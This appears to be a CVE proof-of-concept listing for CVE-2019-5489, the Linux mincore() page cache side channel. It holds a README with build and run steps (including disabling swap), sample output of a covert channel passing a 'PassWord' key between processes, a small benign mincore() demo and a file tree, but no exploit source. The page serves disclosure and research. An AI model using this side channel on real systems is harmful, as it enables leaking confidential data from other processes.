CVE-2019-5489 PoC — Linux kernel information disclosure vulnerability

Associated Vulnerability
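Title: Linux kernel information disclosure vulnerability (CVE-2019-5489)
Description: The Linux kernel is the kernel used by Linux, the open-source operating system released by the Linux Foundation (USA). The implementation of mincore() in mm/mincore.c in Linux kernel 4.19.13 and earlier contains an information disclosure vulnerability. A local attacker can exploit it to sniff confidential information.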
Description
Page Cache Side Channel Attacks (CVE-2019-5489) proof of concept for Linux
Readme
# CVE 2019-5489
This repository contains Page Cache Side Channel Attacks (CVE-2019-5489) proof of concept for Linux.

In order to evaluate the page cache side channel, I have implemented a **covert channel** between two processes.
The sender process sends confidential data to a receiver process via the page cache side channel.
Page cache attacks have been mitigated in Linux Kernel 5.0 and later, so **this PoC will only work before Linux Kernel 5.0**.

NOTE: I've tested that it works on Ubuntu 18.04, Linux 4.15.0-70.
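
As an added illustration (not part of this repository's code), the C program below shows what `mincore()` returns: one residency byte per page, answered without reading the page itself, which is the information the CVE description refers to. It only inspects a sparse temporary file the caller creates; `resident_pages`, `demo_own_file` and the `/tmp/mincore_demo_XXXXXX` template are names made up for this example.

```c
#define _DEFAULT_SOURCE
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/mman.h>
#include <unistd.h>

/* Pages of `path` that mincore() reports resident; -1 on error. With `touch`
 * set, every page is first read through the mapping (faulting it in). */
long resident_pages(const char *path, int touch, long *total)
{
    long psz = sysconf(_SC_PAGESIZE), hits = -1;
    int fd = open(path, O_RDONLY);
    off_t len = fd < 0 ? -1 : lseek(fd, 0, SEEK_END);
    if (len <= 0) { if (fd >= 0) close(fd); return -1; }
    *total = (len + psz - 1) / psz;
    unsigned char *vec = malloc(*total);          /* one byte per page */
    void *map = mmap(NULL, len, PROT_READ, MAP_SHARED, fd, 0);
    volatile const unsigned char *p = map;
    if (vec && map != MAP_FAILED) {
        for (long i = 0; touch && i < *total; i++)
            (void)p[i * psz];                     /* volatile read of one byte */
        hits = mincore(map, len, vec) == 0 ? 0 : -1;
        for (long i = 0; hits >= 0 && i < *total; i++)
            hits += vec[i] & 1;                   /* bit 0: page is resident */
    }
    if (map != MAP_FAILED) munmap(map, len);
    free(vec); close(fd);
    return hits;
}

/* Constructed sample: a sparse temp file owned by the caller (made-up path). */
long demo_own_file(long pages, int touch, long *total)
{
    char path[] = "/tmp/mincore_demo_XXXXXX";
    int fd = mkstemp(path);
    if (fd < 0) return -1;
    long r = ftruncate(fd, pages * sysconf(_SC_PAGESIZE)) == 0
                 ? resident_pages(path, touch, total) : -1;
    close(fd); unlink(path);
    return r;
}

int main(void)
{
    long n = 0, cold = demo_own_file(8, 0, &n), warm = demo_own_file(8, 1, &n);
    printf("untouched: %ld/%ld resident, touched: %ld/%ld\n", cold, n, warm, n);
    return warm < 0;
}
```

The untouched count depends on the kernel and filesystem; the touched count equals the page count because every page was just faulted in.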

## Building
Run the following command.
```sh
git clone https://github.com/mmxsrup/CVE-2019-5489
cd CVE-2019-5489
make
```

## Running
Disable swap space to make the attack easier.
```sh
swapoff -a
```
### Terminal 1
First, run the following command on terminal 1.
```sh
make run-sender
```
### Terminal 2
After `sending 1th character ...` is output on terminal 1, run the following command.
```sh
make run-receiver
```

## Output
If the execution is successful, the following will be output.  
This shows that the key was sent from the Sender process to the Receiver process via the page cache side channel.
### Terminal 1
```txt
LD_LIBRARY_PATH=. ./sender
Sender process
ecicting page cache ...
sending 1th character ...
ecicting page cache ...
sending 2th character ...
ecicting page cache ...
sending 3th character ...
ecicting page cache ...
sending 4th character ...
ecicting page cache ...
sending 5th character ...
ecicting page cache ...
sending 6th character ...
ecicting page cache ...
sending 7th character ...
ecicting page cache ...
sending 8th character ...
ecicting page cache ...
sending 9th character ...
```
### Terminal 2
```txt
LD_LIBRARY_PATH=. ./receiver
Sender process
waiting ...
recved caracter(P)
waiting ...
recved caracter(a)
waiting ...
recved caracter(s)
waiting ...
recved caracter(s)
waiting ...
recved caracter(W)
waiting ...
recved caracter(o)
waiting ...
recved caracter(r)
waiting ...
recved caracter(d)
waiting ...
recved caracter()
Received key: PassWord
```

## References
- Daniel Gruss et al. Page cache attacks [CCS 19]
File Snapshot

```txt
[4.0K] /data/pocs/a05f830ef3b53bce197deac573370232a2077911
├── [ 981] covert_channel.c
├── [ 245] covert_channel.h
├── [1.0K] LICENSE
├── [ 728] Makefile
├── [2.0K] README.md
├── [1.3K] receiver.c
├── [1.9K] sender.c
├── [1.9K] util.c
└── [ 164] util.h

0 directories, 9 files
```